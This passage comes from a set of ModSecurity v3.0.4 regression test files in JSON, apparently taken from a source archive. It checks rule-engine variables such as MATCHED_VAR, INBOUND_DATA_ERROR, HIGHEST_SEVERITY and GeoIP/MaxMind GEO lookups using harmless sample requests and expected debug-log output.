"test", "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\r", "Content-Type: text/plain\r", "\r", "This is another very small test file..\r", "----------------------------756b6d74fa1a8ee2--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"1\" \\(Variable: MULTIPART_CRLF_LF_LINES\\)" }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_CRLF_LF_LINES \"@contains 0\" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-MODSEC_BUILD.json0000644000175000017500000000201213607066010026260 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: MODSEC_BUILD (1/1)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"03([0-9]+)\" \\(Variable: MODSEC_BUILD\\)" }, "rules":[ "SecRuleEngine On", "SecRule MODSEC_BUILD \"@contains test\" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-MATCHED_VAR_NAME.json0000644000175000017500000000410113607066010026745 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: MATCHED_VAR_NAME (1/2)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?keyI=value&keyII=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"ARGS:keyII\" \\(Variable: MATCHED_VAR_NAME\\)" }, "rules":[ "SecRuleEngine On", "SecRule ARGS:keyI \"@contains value\" \"chain,id:28,pass\"", "SecRule ARGS:keyII \"@contains other_value\" \"chain\"", "SecRule MATCHED_VAR_NAME \"@contains asdf\" \"\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: MATCHED_VAR_NAME (2/2)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?keyI=value&keyII=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":" Target value: \"ARGS:keyII\" \\(Variable: MATCHED_VAR_NAME\\)" }, "rules":[ "SecRuleEngine On", "SecRule ARGS:keyI \"@contains value\" \"chain,id:28,pass\"", "SecRule ARGS:keyII \"@contains other_value\" \"chain\"", "SecRule MATCHED_VAR_NAME \"@contains asdf\" \"\"", "SecRule MATCHED_VAR_NAME \"@contains value\" \"id:29\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-MATCHED_VARS_NAMES.json0000644000175000017500000000414213607066010027220 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: MATCHED_VARS_NAMES (1/2)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?keyI=value&keyII=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"ARGS:keyII\" \\(Variable: MATCHED_VARS_NAMES:ARGS:keyII\\)" }, "rules":[ "SecRuleEngine On", "SecRule ARGS:keyI \"@contains value\" \"chain,id:28,pass\"", "SecRule ARGS:keyII \"@contains other_value\" \"chain\"", "SecRule MATCHED_VARS_NAMES \"@contains asdf\" \"\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: MATCHED_VARS_NAMES (2/2)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?keyI=value&keyII=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"ARGS:keyI\" \\(Variable: MATCHED_VARS_NAMES:ARGS:keyI\\)" }, "rules":[ "SecRuleEngine On", "SecRule ARGS:keyI \"@contains value\" \"chain,id:28,pass\"", "SecRule ARGS:keyII \"@contains other_value\" \"chain\"", "SecRule MATCHED_VARS_NAMES \"@contains asdf\" \"\"", "SecRule MATCHED_VARS_NAMES \"@contains value\" \"id:29\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-MATCHED_VARS.json0000644000175000017500000000405613607066010026301 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: MATCHED_VARS (1/2)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?keyI=value&keyII=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"value\" \\(Variable: MATCHED_VARS:ARGS:keyI\\)" }, "rules":[ "SecRuleEngine On", "SecRule ARGS:keyI \"@contains value\" \"chain,id:28,pass\"", "SecRule ARGS:keyII \"@contains other_value\" \"chain\"", "SecRule MATCHED_VARS \"@contains asdf\" \"\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: MATCHED_VARS (2/2)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?keyI=value&keyII=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"value\" \\(Variable: MATCHED_VARS:ARGS:keyI\\)" }, "rules":[ "SecRuleEngine On", "SecRule ARGS:keyI \"@contains value\" \"chain,id:28,pass\"", "SecRule ARGS:keyII \"@contains other_value\" \"chain\"", "SecRule MATCHED_VARS \"@contains asdf\" \"\"", "SecRule MATCHED_VARS \"@contains value\" \"id:29\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-MATCHED_VAR.json0000644000175000017500000000371413607066010026156 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: MATCHED_VAR (1/2)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"other_value\" \\(Variable: MATCHED_VAR\\)" }, "rules":[ "SecRuleEngine On", "SecRule ARGS:key \"@contains other_value\" \"chain,id:28,pass\"", "SecRule MATCHED_VAR \"@contains asdf\" \"\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: MATCHED_VAR (2/2)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Rule returned 0" }, "rules":[ "SecRuleEngine On", "SecRule ARGS:key \"@contains other_value\" \"chain,id:28,pass\"", "SecRule MATCHED_VAR \"@contains Aasdf\" \"\"", "SecRule MATCHED_VAR \"@contains other_value\" \"id:29,pass\"", "SecRule MATCHED_VAR \"@contains other_value\" \"id:30,pass\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-INBOUND_DATA_ERROR.json0000644000175000017500000000524213607066010027237 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: INBOUND_DATA_ERROR (1/2)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"0\" \\(Variable: INBOUND_DATA_ERROR\\)" }, "rules":[ "SecRuleEngine On", "SecRule INBOUND_DATA_ERROR \"@eq 1\" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: INBOUND_DATA_ERROR (1/1)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file..", "--------------------------756b6d74fa1a8ee2--" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"1\" \\(Variable: INBOUND_DATA_ERROR\\)" }, "rules":[ "SecRuleEngine On", "SecRequestBodyLimit 2", "SecRule INBOUND_DATA_ERROR \"@eq 1\" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-HIGHEST_SEVERITY.json0000644000175000017500000000371013607066010027022 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: HIGHEST_SEVERITY (1/2)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"0\" \\(Variable: HIGHEST_SEVERITY\\)" }, "rules":[ "SecRuleEngine On", "SecRule REMOTE_ADDR \"@contains 200.249\" \"id:1,pass,t:trim,severity:0\"", "SecRule HIGHEST_SEVERITY \"@lt 10\" \"id:2,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: HIGHEST_SEVERITY (2/2)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"0\" \\(Variable: HIGHEST_SEVERITY\\)" }, "rules":[ "SecRuleEngine On", "SecRule REMOTE_ADDR \"@contains 200.249\" \"id:1,pass,t:trim,severity:EMERGENCY\"", "SecRule HIGHEST_SEVERITY \"@lt 10\" \"id:2,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-GEO.json0000644000175000017500000004515413607066010025017 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "resource":"geoip", "title":"Testing Variables :: GEO:LONGITUDE [GeoIP]", "client":{ "ip":"64.17.254.216", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"-118.403999\" \\(Variable: GEO:LONGITUDE\\)" }, "rules":[ "SecRuleEngine On", "SecGeoLookupDb test-cases\/data\/geo\/GeoIPCity.dat", "SecRule REMOTE_ADDR \"@geoLookup\" \"id:1,pass,t:trim\"", "SecRule GEO \"@contains test \" \"id:2,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "resource":"maxmind", "title":"Testing Variables :: GEO:COUNTRY_NAME [maxmind]", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"Brazil\" \\(Variable: GEO:COUNTRY_NAME\\)" }, "rules":[ "SecRuleEngine On", "SecGeoLookupDb test-cases\/data\/GeoIP2-City-Test.mmdb", "SecRule REMOTE_ADDR \"@geoLookup\" \"id:1,pass,t:trim\"", "SecRule GEO \"@contains test \" \"id:2,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "resource":"geoip", "title":"Testing Variables :: GEO:LATITUDE [GeoIP]", "client":{ "ip":"64.17.254.216", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"33.916401\" \\(Variable: GEO:LATITUDE\\)" }, "rules":[ "SecRuleEngine On", "SecGeoLookupDb test-cases\/data\/geo\/GeoIPCity.dat", "SecRule REMOTE_ADDR \"@geoLookup\" \"id:1,pass,t:trim\"", "SecRule GEO \"@contains test \" \"id:2,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "resource":"geoip", "title":"Testing Variables :: GEO:COUNTRY_CODE3 [GeoIP]", "client":{ "ip":"64.17.254.216", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"USA\" \\(Variable: GEO:COUNTRY_CODE3\\)" }, "rules":[ "SecRuleEngine On", "SecGeoLookupDb test-cases\/data\/geo\/GeoIPCity.dat", "SecRule REMOTE_ADDR \"@geoLookup\" \"id:1,pass,t:trim\"", "SecRule GEO \"@contains test \" \"id:2,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "resource":"geoip", "title":"Testing Variables :: GEO:COUNTRY_CODE [GeoIP]", "client":{ "ip":"64.17.254.216", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"US\" \\(Variable: GEO:COUNTRY_CODE\\)" }, "rules":[ "SecRuleEngine On", "SecGeoLookupDb test-cases\/data\/geo\/GeoIPCity.dat", "SecRule REMOTE_ADDR \"@geoLookup\" \"id:1,pass,t:trim\"", "SecRule GEO \"@contains test \" \"id:2,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "resource":"geoip", "title":"Testing Variables :: GEO:COUNTRY_CONTINENT [GeoIP]", "client":{ "ip":"64.17.254.216", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"NA\" \\(Variable: GEO:COUNTRY_CONTINENT\\)" }, "rules":[ "SecRuleEngine On", "SecGeoLookupDb test-cases\/data\/geo\/GeoIPCity.dat", "SecRule REMOTE_ADDR \"@geoLookup\" \"id:1,pass,t:trim\"", "SecRule GEO \"@contains test \" \"id:2,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "resource":"geoip", "title":"Testing Variables :: GEO:AREA_CODE [GeoIP]", "client":{ "ip":"64.17.254.216", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"310\" \\(Variable: GEO:AREA_CODE\\)" }, "rules":[ "SecRuleEngine On", "SecGeoLookupDb test-cases\/data\/geo\/GeoIPCity.dat", "SecRule REMOTE_ADDR \"@geoLookup\" \"id:1,pass,t:trim\"", "SecRule GEO \"@contains test \" \"id:2,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "resource":"geoip", "title":"Testing Variables :: GEO:DMA_CODE [GeoIP]", "client":{ "ip":"64.17.254.216", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"803\" \\(Variable: GEO:DMA_CODE\\)" }, "rules":[ "SecRuleEngine On", "SecGeoLookupDb test-cases\/data\/geo\/GeoIPCity.dat", "SecRule REMOTE_ADDR \"@geoLookup\" \"id:1,pass,t:trim\"", "SecRule GEO \"@contains test \" \"id:2,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "resource":"geoip", "title":"Testing Variables :: GEO:POSTAL_CODE [GeoIP]", "client":{ "ip":"64.17.254.216", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"90245\" \\(Variable: GEO:POSTAL_CODE\\)" }, "rules":[ "SecRuleEngine On", "SecGeoLookupDb test-cases\/data\/geo\/GeoIPCity.dat", "SecRule REMOTE_ADDR \"@geoLookup\" \"id:1,pass,t:trim\"", "SecRule GEO \"@contains test \" \"id:2,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "resource":"geoip", "title":"Testing Variables :: GEO:REGION [GeoIP]", "client":{ "ip":"64.17.254.216", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"California\" \\(Variable: GEO:REGION\\)" }, "rules":[ "SecRuleEngine On", "SecGeoLookupDb test-cases\/data\/geo\/GeoIPCity.dat", "SecRule REMOTE_ADDR \"@geoLookup\" \"id:1,pass,t:trim\"", "SecRule GEO \"@contains test \" \"id:2,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "resource":"geoip", "title":"Testing Variables :: GEO:CITY [GeoIP]", "client":{ "ip":"64.17.254.216", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"El Segundo\" \\(Variable: GEO:CITY\\)" }, "rules":[ "SecRuleEngine On", "SecGeoLookupDb test-cases\/data\/geo\/GeoIPCity.dat", "SecRule REMOTE_ADDR \"@geoLookup\" \"id:1,pass,t:trim\"", "SecRule GEO \"@contains test \" \"id:2,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "resource":"geoip", "title":"Testing Variables :: GEO:LONGITUDE [GeoIP]", "client":{ "ip":"64.17.254.216", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"-118.403999\" \\(Variable: GEO:LONGITUDE\\)" }, "rules":[ "SecRuleEngine On", "SecGeoLookupDb test-cases\/data\/geo\/GeoIPCity.dat", "SecRule REMOTE_ADDR \"@geoLookup\" \"id:1,pass,t:trim\"", "SecRule GEO \"@contains test \" \"id:2,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "resource":"maxmind", "title":"Testing Variables :: GEO:COUNTRY_NAME [maxmind]", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"Brazil\" \\(Variable: GEO:COUNTRY_NAME\\)" }, "rules":[ "SecRuleEngine On", "SecGeoLookupDb test-cases\/data\/GeoIP2-City-Test.mmdb", "SecRule REMOTE_ADDR \"@geoLookup\" \"id:1,pass,t:trim\"", "SecRule GEO \"@contains test \" \"id:2,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "resource":"maxmind", "title":"Testing Variables :: GEO:LATITUDE [maxmind]", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"-8.051502\" \\(Variable: GEO:LATITUDE\\)" }, "rules":[ "SecRuleEngine On", "SecGeoLookupDb test-cases\/data\/GeoIP2-City-Test.mmdb", "SecRule REMOTE_ADDR \"@geoLookup\" \"id:1,pass,t:trim\"", "SecRule GEO \"@contains test \" \"id:2,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "resource":"maxmind", "title":"Testing Variables :: GEO:COUNTRY_CODE [maxmind]", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"BR\" \\(Variable: GEO:COUNTRY_CODE\\)" }, "rules":[ "SecRuleEngine On", "SecGeoLookupDb test-cases\/data\/GeoIP2-City-Test.mmdb", "SecRule REMOTE_ADDR \"@geoLookup\" \"id:1,pass,t:trim\"", "SecRule GEO \"@contains test \" \"id:2,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "resource":"maxmind", "title":"Testing Variables :: GEO:COUNTRY_CONTINENT [maxmind]", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"South America\" \\(Variable: GEO:COUNTRY_CONTINENT\\)" }, "rules":[ "SecRuleEngine On", "SecGeoLookupDb test-cases\/data\/GeoIP2-City-Test.mmdb", "SecRule REMOTE_ADDR \"@geoLookup\" \"id:1,pass,t:trim\"", "SecRule GEO \"@contains test \" \"id:2,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "resource":"maxmind", "title":"Testing Variables :: GEO:POSTAL_CODE [maxmind]", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"50040090\" \\(Variable: GEO:POSTAL_CODE\\)" }, "rules":[ "SecRuleEngine On", "SecGeoLookupDb test-cases\/data\/GeoIP2-City-Test.mmdb", "SecRule REMOTE_ADDR \"@geoLookup\" \"id:1,pass,t:trim\"", "SecRule GEO \"@contains test \" \"id:2,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "resource":"maxmind", "title":"Testing Variables :: GEO:CITY [maxmind]", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, 